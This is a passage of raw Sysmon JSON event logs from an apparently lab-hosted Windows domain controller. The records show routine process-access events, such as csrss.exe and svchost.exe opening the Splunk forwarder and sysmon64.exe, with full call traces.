Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10AE-5F25-0000-001041EA0400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10AE-5F25-0000-001041EA0400}","TargetProcessId":"3868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
